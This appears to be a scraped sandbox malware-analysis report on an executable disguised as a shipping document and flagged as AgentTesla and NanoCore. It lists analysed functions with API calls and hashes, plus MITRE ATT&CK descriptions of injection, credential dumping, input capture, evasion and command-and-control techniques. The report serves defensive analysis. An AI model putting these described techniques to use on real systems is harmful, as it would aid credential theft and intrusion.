Function 00A19B2A, Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00A19BC5

Memory Dump Source

Source File: 00000005.00000002.486275296.0000000000A10000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: false

Similarity

API ID: Window
String ID:
API String ID: 2353593579-0
Opcode ID: 94049e88c0e3a24dca1e9db61b58eb7f33eb5e1c4dae3059a584198ca81dac14
Instruction ID: 1fd33568f4d23b7b6f1e644084e06bc6cc0433665165acd369fa8380bfca56a0
Opcode Fuzzy Hash: 94049e88c0e3a24dca1e9db61b58eb7f33eb5e1c4dae3059a584198ca81dac14
Instruction Fuzzy Hash: 6511C434F0C2548FC741A7B898286DE7FF69F85344B1584B6D409DB352EA348C4AC792

Uniqueness

Uniqueness Score: -1.00%

Function 026D6B68, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 026D6BEF

Memory Dump Source

Source File: 00000005.00000002.488793188.00000000026D0000.00000040.00000001.sdmp, Offset: 026D0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 47f082e553d0ae975b84699a97bba3e9c4c04f02a58c63f917f12d649f2fa441
Instruction ID: 73a035220d623e17c9e71dd92a153681f7a6c8d03e4dc237059577f88985f8dd
Opcode Fuzzy Hash: 47f082e553d0ae975b84699a97bba3e9c4c04f02a58c63f917f12d649f2fa441
Instruction Fuzzy Hash: 1721F3B5D002489FDB10CFAAD984AEEFBF8FB48324F14841AE954A7310D374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 026D6B61, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 026D6BEF

Memory Dump Source

Source File: 00000005.00000002.488793188.00000000026D0000.00000040.00000001.sdmp, Offset: 026D0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 2980742b95ada42cd59a8d07d06c9f8bc76b9cb9a4e310db98bfc3454f7acca6
Instruction ID: 6d2004701f60be13d9fc6e543014e2358bfe15a5920af199bb295c491315ff1c
Opcode Fuzzy Hash: 2980742b95ada42cd59a8d07d06c9f8bc76b9cb9a4e310db98bfc3454f7acca6
Instruction Fuzzy Hash: 8E2103B5D002489FDB10CFA9D584AEEBBF5FB48320F14841AE954A7210D778A955CF61

Uniqueness

Uniqueness Score: -1.00%

Function 026DBE69, Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 026DBEF2

Memory Dump Source

Source File: 00000005.00000002.488793188.00000000026D0000.00000040.00000001.sdmp, Offset: 026D0000, based on PE: false

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 8cfc670953c3ab0fca628e3bd56f7c41ea395a4715f44017e64e9340003010c5
Instruction ID: d350ffe662b7b5137d00176a6001cc2b3906cea8946cd2ccc9b265aea9f9d4d4
Opcode Fuzzy Hash: 8cfc670953c3ab0fca628e3bd56f7c41ea395a4715f44017e64e9340003010c5
Instruction Fuzzy Hash: 032188B1A05349CFDB20DF69CA1839EBBF0EB09318F14846AD044E7741C7395908CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 026DBE78, Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 026DBEF2

Memory Dump Source

Source File: 00000005.00000002.488793188.00000000026D0000.00000040.00000001.sdmp, Offset: 026D0000, based on PE: false

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: b369d3ddf25237ecfd7a3037d8891655e7a3768a2689a73e9a0a75cfa4f448ac
Instruction ID: bccf8454f8606d8719099070e5cd80abfd05976ef7f31123f2ff8537d8f8d8d6
Opcode Fuzzy Hash: b369d3ddf25237ecfd7a3037d8891655e7a3768a2689a73e9a0a75cfa4f448ac
Instruction Fuzzy Hash: 1E115971D01309CFDB20DFA9CA0879EBBF4EB48318F208469E405A7740C7396945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 026D32D8, Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 026D4116

Memory Dump Source

Source File: 00000005.00000002.488793188.00000000026D0000.00000040.00000001.sdmp, Offset: 026D0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 693804add40cf2da47a8288794232cf371404db2e8b83a81d442ca0cb5fcdb24
Instruction ID: 1630354a26b14ad181080ec31fbb9d0f3fde7d3d1a1f54271b027dcbf09d630d
Opcode Fuzzy Hash: 693804add40cf2da47a8288794232cf371404db2e8b83a81d442ca0cb5fcdb24
Instruction Fuzzy Hash: 3A1104B2D006498FDB20DF9AC944BDEFBF4EB49214F11842AD469B7700D774A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 026D40AA, Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 026D4116

Memory Dump Source

Source File: 00000005.00000002.488793188.00000000026D0000.00000040.00000001.sdmp, Offset: 026D0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 7483fa5d31de21be4a84a3e2b18a95a2eb705107ac15edaebb983a956f32cf7f
Instruction ID: 68d6591bd10ffcc5afba82dd6c6638b4a7b39f40ee144dced2215868e056c81b
Opcode Fuzzy Hash: 7483fa5d31de21be4a84a3e2b18a95a2eb705107ac15edaebb983a956f32cf7f
Instruction Fuzzy Hash: 4411FDB6D006498FCB10CFAAD54469EFBF5AB88324F11842AC469B7600C778A946CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A19B80, Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00A19BC5

Memory Dump Source

Source File: 00000005.00000002.486275296.0000000000A10000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: false

Similarity

API ID: Window
String ID:
API String ID: 2353593579-0
Opcode ID: ba9e9da30934749406b339c24603b9bf34373fc9bb48e1b94ab2a3388c63fdbd
Instruction ID: f43ed01b22bd61006fb5af020087d8fa46abff9b18736e967b0868ffa31b7291
Opcode Fuzzy Hash: ba9e9da30934749406b339c24603b9bf34373fc9bb48e1b94ab2a3388c63fdbd
Instruction Fuzzy Hash: 72F08271F042189B8B40BBB9581429F7AF9EF88291B100535D80AD3700FA348E0687D2

Uniqueness

Uniqueness Score: -1.00%

Function 00F7D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.488377570.0000000000F7D000.00000040.00000001.sdmp, Offset: 00F7D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb05c178474a121b312ed09478f0901ee880c6acc37578b9cae6365c582a3fee
Instruction ID: 5d0ead5a69d09acf7cb856a2c178d850277a676d701a7837eb9e02f63ee3f476
Opcode Fuzzy Hash: bb05c178474a121b312ed09478f0901ee880c6acc37578b9cae6365c582a3fee
Instruction Fuzzy Hash: 7421F576504240DFCB14DF14D9C4B16BB75FF88324F64C96AD80E4B24AC73AD846EA62

Uniqueness

Uniqueness Score: -1.00%

Function 00F7D005, Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.488377570.0000000000F7D000.00000040.00000001.sdmp, Offset: 00F7D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f116d2325fce8b5d7bc8b51c7f65be032160487152f593968c9e774a6ae38115
Instruction ID: f055b2261e55bcf24bdb37232eb8bd2a2eb1215715814ab9d0174f3028a71bae
Opcode Fuzzy Hash: f116d2325fce8b5d7bc8b51c7f65be032160487152f593968c9e774a6ae38115
Instruction Fuzzy Hash: 55217F755093808FCB02CF20D994B15BF71EF46224F28C5EBD8498B697C33A984ACB62

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004E4BA0, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.483921714.00000000004E2000.00000002.00020000.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000005.00000002.483859610.00000000004E0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.484571270.0000000000518000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b44d1c8ab0e33426cbea6490f6f04c823e5349f7c1174290f4023d3181a3b9d
Instruction ID: 7aa32e2fcfcd89e492d58f8d78eb4e7c4fea9daf54e9a573ec75f02c0b14d817
Opcode Fuzzy Hash: 8b44d1c8ab0e33426cbea6490f6f04c823e5349f7c1174290f4023d3181a3b9d
Instruction Fuzzy Hash: FFC08C21409BC38FE303BB38AA354807F31BE8320474E14E2C0A09B063FA20A9A4CB52

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Consignment Document PL&BL Draft.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Agenttesla

Threatname: NanoCore

Yara Overview

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre